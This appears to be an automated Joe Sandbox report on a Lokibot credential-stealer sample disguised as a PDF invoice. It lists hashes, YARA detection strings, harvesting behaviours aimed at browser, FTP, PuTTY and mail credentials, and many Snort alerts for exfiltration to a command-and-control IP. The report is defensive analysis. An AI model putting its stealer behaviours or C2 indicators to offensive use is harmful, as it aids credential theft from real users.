Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PI_Nov9071011998_ENTRUSTpdf.exe

Overview

General Information

Sample Name:PI_Nov9071011998_ENTRUSTpdf.exe
Analysis ID:326333
MD5:2349d50a67c2ef85661ef2be6def2cc3
SHA1:b0cfbb76140f37e483fa2ece9c790512e48f29d4
SHA256:9e196418dece3402ea9627106e6e246d5186392f25f8ada694598168481fb0bf
Tags:exeLoki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
.NET source code contains potential unpacker
Found C&C like URL pattern
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
              • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x153fc:$a2: last_compatible_version
              1.2.PI_Nov9071011998_ENTRUSTpdf.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x13bff:$des3: 68 03 66 00 00
              • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 5 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exeVirustotal: Detection: 20%Perma Link
              Machine Learning detection for sampleShow sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49709 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49710 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49711 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49711
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49712 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49712
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49713 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49713
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49714 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49714
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49715 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49715
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49716 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49716
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49717 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49717
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49718 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49718
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49719 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49719
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49720 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49720
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49721 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49721
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49722 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49722
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49723 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49723
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49724 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49724
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49725 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49725
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49726 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49726
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49727 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49727
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49728 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49728
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49729 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49729
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49730 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49730
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49731 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49731
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49734 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49734
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49735 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49735
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49736 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49736
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49739 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49739
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49740 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49740
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49742 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49742
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49743 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49743
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49744 -> 47.91.79.163:80
